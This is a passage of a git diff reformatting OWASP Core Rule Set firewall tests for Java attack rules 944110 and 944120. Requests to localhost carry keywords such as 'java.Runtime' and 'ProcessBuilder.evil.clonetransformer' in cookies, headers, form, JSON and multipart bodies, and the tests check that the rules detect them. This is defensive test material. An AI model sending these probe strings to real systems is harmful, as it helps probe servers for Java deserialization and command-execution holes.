80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.Runtime=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 8 desc: Cookie name includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.ProcessBuilder=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.ProcessBuilder=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 9 desc: Request header test includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 10 desc: Request header test includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 11 desc: XML element includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944110] + - test_id: 12 desc: XML attribute name includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944110] + - test_id: 13 desc: XML attribute value includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944110] + - test_id: 14 desc: XML element value includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.Runtime" - output: - log_contains: "id \"944110\"" - - test_title: 944110-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.Runtime" + output: + log: + expect_ids: [944110] + - test_id: 15 desc: XML element includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944110] + - test_id: 16 desc: XML attribute name includes keyworda java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944110] + - test_id: 17 desc: XML attribute value includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944110] + - test_id: 18 desc: XML element value includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.ProcessBuilder" - output: - log_contains: "id \"944110\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.ProcessBuilder" + output: + log: + expect_ids: [944110] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml index b1c48a5..f4b8e75 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml @@ -1,2945 +1,2944 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944120.yaml" description: "Positive tests for rule 944120" +rule_id: 944120 tests: - - test_title: 944120-1 + - test_id: 1 desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 2 desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer=test" + output: + log: + expect_ids: [944120] + - test_id: 3 desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 4 desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.clonetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.clonetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 5 desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 6 desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 7 desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 8 desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 9 desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 10 desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 11 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 12 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" + output: + log: + expect_ids: [944120] + - test_id: 13 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.clonetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-15 + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.clonetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-16 + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 